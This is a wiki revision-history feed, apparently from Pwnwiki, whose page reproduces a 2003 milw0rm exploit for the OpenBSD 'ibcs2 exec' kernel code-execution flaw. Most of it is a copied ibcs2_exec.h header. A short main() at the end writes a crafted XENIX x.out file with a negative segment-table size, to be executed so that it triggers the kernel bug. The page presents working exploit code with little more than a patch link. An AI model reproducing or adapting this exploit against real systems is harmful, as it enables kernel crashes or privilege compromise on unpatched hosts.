https://pwnwiki.com/index.php?action=history&feed=atom&title=OpenBSD_-_%27ibcs2_exec%27_%E5%85%A7%E6%A0%B8%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
OpenBSD - 'ibcs2 exec' 內核代碼執行漏洞 - Revision history
2026-04-10T16:41:03Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=OpenBSD_-_%27ibcs2_exec%27_%E5%85%A7%E6%A0%B8%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2072&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> // // Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch // #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdi..."
2021-05-03T12:39:19Z
<p>Created page with "==EXP== <pre> // // Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch // #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdi..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
//<br />
// Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch<br />
//<br />
#include <sys/types.h><br />
#include <sys/stat.h><br />
#include <fcntl.h><br />
#include <stdio.h><br />
/* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */<br />
/* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */<br />
<br />
/*<br />
* Copyright (c) 1994, 1995 Scott Bartram<br />
* All rights reserved.<br />
*<br />
* adapted from sys/sys/exec_ecoff.h<br />
* based on Intel iBCS2<br />
*<br />
* Redistribution and use in source and binary forms, with or without<br />
* modification, are permitted provided that the following conditions<br />
* are met:<br />
* 1. Redistributions of source code must retain the above copyright<br />
* notice, this list of conditions and the following disclaimer.<br />
* 2. Redistributions in binary form must reproduce the above copyright<br />
* notice, this list of conditions and the following disclaimer in the<br />
* documentation and/or other materials provided with the distribution.<br />
* 3. The name of the author may not be used to endorse or promote products<br />
* derived from this software without specific prior written permission<br />
*<br />
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR<br />
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES<br />
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.<br />
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,<br />
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT<br />
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,<br />
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY<br />
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT<br />
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF<br />
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.<br />
*/<br />
<br />
#ifndef _IBCS2_EXEC_H_<br />
#define _IBCS2_EXEC_H_<br />
<br />
/*<br />
* COFF file header<br />
*/<br />
<br />
struct coff_filehdr {<br />
u_short f_magic; /* magic number */<br />
u_short f_nscns; /* # of sections */<br />
long f_timdat; /* timestamp */<br />
long f_symptr; /* file offset of symbol table */<br />
long f_nsyms; /* # of symbol table entries */<br />
u_short f_opthdr; /* size of optional header */<br />
u_short f_flags; /* flags */<br />
};<br />
<br />
/* f_magic flags */<br />
#define COFF_MAGIC_I386 0x14c<br />
<br />
/* f_flags */<br />
#define COFF_F_RELFLG 0x1<br />
#define COFF_F_EXEC 0x2<br />
#define COFF_F_LNNO 0x4<br />
#define COFF_F_LSYMS 0x8<br />
#define COFF_F_SWABD 0x40<br />
#define COFF_F_AR16WR 0x80<br />
#define COFF_F_AR32WR 0x100<br />
<br />
/*<br />
* COFF system header<br />
*/<br />
<br />
struct coff_aouthdr {<br />
short a_magic;<br />
short a_vstamp;<br />
long a_tsize;<br />
long a_dsize;<br />
long a_bsize;<br />
long a_entry;<br />
long a_tstart;<br />
long a_dstart;<br />
};<br />
<br />
/* magic */<br />
#define COFF_OMAGIC 0407 /* text not write-protected; data seg<br />
is contiguous with text */<br />
#define COFF_NMAGIC 0410 /* text is write-protected; data starts<br />
at next seg following text */<br />
#define COFF_ZMAGIC 0413 /* text and data segs are aligned for<br />
direct paging */<br />
#define COFF_SMAGIC 0443 /* shared lib */<br />
<br />
/*<br />
* COFF section header<br />
*/<br />
<br />
struct coff_scnhdr {<br />
char s_name[8];<br />
long s_paddr;<br />
long s_vaddr;<br />
long s_size;<br />
long s_scnptr;<br />
long s_relptr;<br />
long s_lnnoptr;<br />
u_short s_nreloc;<br />
u_short s_nlnno;<br />
long s_flags;<br />
};<br />
<br />
/* s_flags */<br />
#define COFF_STYP_REG 0x00<br />
#define COFF_STYP_DSECT 0x01<br />
#define COFF_STYP_NOLOAD 0x02<br />
#define COFF_STYP_GROUP 0x04<br />
#define COFF_STYP_PAD 0x08<br />
#define COFF_STYP_COPY 0x10<br />
#define COFF_STYP_TEXT 0x20<br />
#define COFF_STYP_DATA 0x40<br />
#define COFF_STYP_BSS 0x80<br />
#define COFF_STYP_INFO 0x200<br />
#define COFF_STYP_OVER 0x400<br />
#define COFF_STYP_SHLIB 0x800<br />
<br />
/*<br />
* COFF shared library header<br />
*/<br />
<br />
struct coff_slhdr {<br />
long entry_len; /* in words */<br />
long path_index; /* in words */<br />
char sl_name[1];<br />
};<br />
<br />
#define COFF_ROUND(val, by) (((val) + by - 1) & ~(by - 1))<br />
<br />
#define COFF_ALIGN(a) ((a) & ~(COFF_LDPGSZ - 1))<br />
<br />
#define COFF_HDR_SIZE \<br />
(sizeof(struct coff_filehdr) + sizeof(struct coff_aouthdr))<br />
<br />
#define COFF_BLOCK_ALIGN(ap, value) \<br />
(ap->a_magic == COFF_ZMAGIC ? COFF_ROUND(value, COFF_LDPGSZ) : \<br />
value)<br />
<br />
#define COFF_TXTOFF(fp, ap) \<br />
(ap->a_magic == COFF_ZMAGIC ? 0 : \<br />
COFF_ROUND(COFF_HDR_SIZE + fp->f_nscns * \<br />
sizeof(struct coff_scnhdr), COFF_SEGMENT_ALIGNMENT(ap)))<br />
<br />
#define COFF_DATOFF(fp, ap) \<br />
(COFF_BLOCK_ALIGN(ap, COFF_TXTOFF(fp, ap) + ap->a_tsize))<br />
<br />
#define COFF_SEGMENT_ALIGN(ap, value) \<br />
(COFF_ROUND(value, (ap->a_magic == COFF_ZMAGIC ? COFF_LDPGSZ : \<br />
COFF_SEGMENT_ALIGNMENT(ap))))<br />
<br />
#define COFF_LDPGSZ 4096<br />
<br />
#define COFF_SEGMENT_ALIGNMENT(ap) 4<br />
<br />
#define COFF_BADMAG(ex) (ex->f_magic != COFF_MAGIC_I386)<br />
<br />
#define IBCS2_HIGH_SYSCALL(n) (((n) & 0x7f) == 0x28)<br />
#define IBCS2_CVT_HIGH_SYSCALL(n) (((n) >> 8) + 128)<br />
<br />
struct exec_package;<br />
int exec_ibcs2_coff_makecmds(struct proc *, struct exec_package *);<br />
<br />
/*<br />
* x.out (XENIX)<br />
*/<br />
<br />
struct xexec {<br />
u_short x_magic; /* magic number */<br />
u_short x_ext; /* size of extended header */<br />
long x_text; /* ignored */<br />
long x_data; /* ignored */<br />
long x_bss; /* ignored */<br />
long x_syms; /* ignored */<br />
long x_reloc; /* ignored */<br />
long x_entry; /* executable entry point */<br />
char x_cpu; /* processor type */<br />
char x_relsym; /* ignored */<br />
u_short x_renv; /* flags */<br />
};<br />
<br />
/* x_magic flags */<br />
#define XOUT_MAGIC 0x0206<br />
<br />
/* x_cpu flags */<br />
#define XC_386 0x004a /* 386, word-swapped */<br />
<br />
/* x_renv flags */<br />
#define XE_V5 0xc000<br />
#define XE_SEG 0x0800<br />
#define XE_ABS 0x0400<br />
#define XE_ITER 0x0200<br />
#define XE_VMOD 0x0100<br />
#define XE_FPH 0x0080<br />
#define XE_LTEXT 0x0040<br />
#define XE_LDATA 0x0020<br />
#define XE_OVER 0x0010<br />
#define XE_FS 0x0008<br />
#define XE_PURE 0x0004<br />
#define XE_SEP 0x0002<br />
#define XE_EXEC 0x0001<br />
<br />
/*<br />
* x.out extended header<br />
*/<br />
<br />
struct xext {<br />
long xe_trsize; /* ignored */<br />
long xe_drsize; /* ignored */<br />
long xe_tbase; /* ignored */<br />
long xe_dbase; /* ignored */<br />
long xe_stksize; /* stack size if XE_FS set in x_renv */<br />
long xe_segpos; /* offset of segment table */<br />
long xe_segsize; /* segment table size */<br />
long xe_mdtpos; /* ignored */<br />
long xe_mdtsize; /* ignored */<br />
char xe_mdttype; /* ignored */<br />
char xe_pagesize; /* ignored */<br />
char xe_ostype; /* ignored */<br />
char xe_osvers; /* ignored */<br />
u_short xe_eseg; /* ignored */<br />
u_short xe_sres; /* ignored */<br />
};<br />
<br />
/*<br />
* x.out segment table<br />
*/<br />
<br />
struct xseg {<br />
u_short xs_type; /* segment type */<br />
u_short xs_attr; /* attribute flags */<br />
u_short xs_seg; /* segment selector number */<br />
char xs_align; /* ignored */<br />
char xs_cres; /* ignored */<br />
long xs_filpos; /* offset of this segment */<br />
long xs_psize; /* physical segment size */<br />
long xs_vsize; /* virtual segment size */<br />
long xs_rbase; /* relocation base address */<br />
u_short xs_noff; /* ignored */<br />
u_short xs_sres; /* ignored */<br />
long xs_lres; /* ignored */<br />
};<br />
<br />
/* xs_type flags */<br />
#define XS_TNULL 0 /* unused */<br />
#define XS_TTEXT 1 /* text (read-only) */<br />
#define XS_TDATA 2 /* data (read-write) */<br />
#define XS_TSYMS 3 /* symbol table (noload) */<br />
#define XS_TREL 4 /* relocation segment (noload) */<br />
#define XS_TSESTR 5 /* string table (noload) */<br />
#define XS_TGRPS 6 /* group segment (noload) */<br />
<br />
#define XS_TIDATA 64<br />
#define XS_TTSS 65<br />
#define XS_TLFIX 66<br />
#define XS_TDNAME 67<br />
#define XS_TDTEXT 68<br />
#define XS_TDFIX 69<br />
#define XS_TOVTAB 70<br />
#define XS_T71 71<br />
#define XS_TSYSTR 72<br />
<br />
/* xs_attr flags */<br />
#define XS_AMEM 0x8000 /* memory image */<br />
#define XS_AITER 0x0001 /* iteration records */<br />
#define XS_AHUGE 0x0002 /* unused */<br />
#define XS_ABSS 0x0004 /* uninitialized data */<br />
#define XS_APURE 0x0008 /* read-only (sharable) segment */<br />
#define XS_AEDOWN 0x0010 /* expand down memory segment */<br />
#define XS_APRIV 0x0020 /* unused */<br />
#define XS_A32BIT 0x0040 /* 32-bit text/data */<br />
<br />
/*<br />
* x.out iteration record<br />
*/<br />
<br />
struct xiter {<br />
long xi_size; /* text/data size */<br />
long xi_rep; /* number of replications */<br />
long xi_offset; /* offset within segment to replicated data */<br />
};<br />
<br />
#define XOUT_HDR_SIZE (sizeof(struct xexec) + sizeof(struct xext))<br />
<br />
int exec_ibcs2_xout_makecmds(struct proc *, struct exec_package *);<br />
<br />
#endif /* !_IBCS2_EXEC_H_ */<br />
<br />
int main(int ac,char **av)<br />
{<br />
int fd;<br />
struct xexec xp;<br />
struct xext xep;<br />
char exe[10];<br />
char fil[]="./vvc";<br />
<br />
fd=open(fil,O_CREAT|O_RDWR,0700);<br />
if (fd==-1) {perror("open");return 1;}<br />
memset(&xp,0,sizeof(xp));<br />
memset(&xep,0,sizeof(xep));<br />
memset(exe,'v',sizeof(exe));<br />
xp.x_magic = XOUT_MAGIC;<br />
xp.x_cpu = XC_386;<br />
xp.x_renv = XE_EXEC;<br />
xp.x_ext = sizeof(xep);<br />
xep.xe_segsize = -1;<br />
write(fd,&xp,sizeof(xp));<br />
write(fd,&xep,sizeof(xep));<br />
write(fd,exe,sizeof(exe));<br />
printf("Now exec %s\n",fil);<br />
<br />
}<br />
<br />
// milw0rm.com [2003-11-07]<br />
<br />
</pre></div>
Pwnwiki